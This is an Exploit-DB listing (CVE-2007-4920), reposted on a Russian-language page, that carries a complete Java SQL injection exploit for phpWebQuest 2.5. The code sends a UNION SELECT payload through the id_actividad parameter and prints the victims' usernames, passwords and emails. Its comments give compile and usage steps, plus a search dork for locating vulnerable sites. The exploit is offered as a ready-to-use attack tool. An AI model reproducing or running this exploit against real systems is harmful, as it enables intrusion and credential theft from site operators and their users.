- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4407
- Проверка EDB
-
- Пройдено
- Автор
- D4REAL_TEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-4920
- Дата публикации
- 2007-09-14
Java:
/*
* script name : phpwebquest
* script version : 2.5
* script website : http://phpwebquest.org
* Bug Finder : D4real_TeaM ('unkn0wnX','n3t-mapper','ToxiC350');
* injected file : webquest/soporte_derecha_w.php
* Variable : id_actividad
* Contact : n3t-mapp3r [At] hotmail [dot] com,is14m [At] hotmail [dot] com,ushermehdi350 [At] hotmail [dot] com
*
* Usage:
* First you must have a JDK 1.4 or more to compile the code
* Compiling: javac -nowarn -g:none SqInjection.java
* Usage: java SqInjection host_name /path/to/script/
* Dork : inurl:/webquest/soporte_derecha_w.php?
*
* GreetZ : s4udi-s3curity-terror, Spy-Boy, R3mix-boY, Dchach-X, DiaboliC4, j4v4k, Hitch4w4, Und34d and all Moroccan,arab hackerS
* Sp.Greetz : s0crateX ;)
*/
import java.io.*;
import java.net.* ;
public class SqInjection {
public static void main(String[] argv) {
Socket lhlawa;
String hName,tra9,bachT3tih=" union select 1,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail) from usuario";
int lmarsa=80;
BufferedReader _______dakhl;PrintWriter _______kharj;
if(argv.length!=2){
System.out.println("Error: args not properly defined");
System.exit (-1);
}
String zgawa[]=argv[0].split(":");
if(zgawa.length==2){
hName=zgawa[0];
try{
lmarsa=Integer.parseInt(zgawa[1]);
}catch(NumberFormatException ex){
System.out.println("Error: Invalid Port");System.exit(0);
}
}else{
hName=argv[0];
}
tra9=argv[1];
System.out.print("Connecing to: "+hName);
try{
lhlawa=new Socket(hName,lmarsa);
System.out.println("\t\t[ OK ]");
String in3alBoh="",taya7Jdo="GET /"+tra9+"/webquest/soporte_derecha_w.php?id_actividad=-1"+URLEncoder.encode(bachT3tih)+"/* HTTP/1.1\n";
taya7Jdo+="Host: "+hName+"\n";
taya7Jdo+="Connection: Close\n\n";
_______kharj=new PrintWriter(lhlawa.getOutputStream());
_______dakhl=new BufferedReader(new InputStreamReader( lhlawa.getInputStream()));
_______kharj.print(taya7Jdo);
_______kharj.flush();
String line=_______dakhl.readLine();
if(line.equalsIgnoreCase("HTTP/1.1 200 OK")==false){
System.out.println("Error:Invalid HTTP protocol");System.exit(0);
}
boolean ok=false;
while((line=_______dakhl.readLine())!=null){
if(ok==false){
if(line.length()==0)
{ok=true;
}
}
else in3alBoh+=line+"\n";
}
_______kharj.close();
_______dakhl.close();
parseData(in3alBoh);
}catch(IOException ex){
System.out.println("\nSocket Error program will exit");
System.exit(0);
}
}
private static void parseData(String haHwaJay){
String uName,passwd,mail,tmp[];
tmp=haHwaJay.split("\n");
for(int i=0;i<tmp.length;i++)
{
if(tmp[i].trim().startsWith("<td width=\"97%\">"))
{
String safiTa7=tmp[i].trim().substring(16,tmp[i].trim().length()-4);
tmp=safiTa7.split (":");
break;
}
}
uName=tmp[0];passwd=tmp[1];mail=tmp[2];
System.out.println("*************************** Informations about the victim ***************************");
System.out.println("User Name: "+uName+"\nPassword: "+passwd+"\nVictimz mail: "+mail);
}
}
# milw0rm.com [2007-09-14]- Источник
- www.exploit-db.com
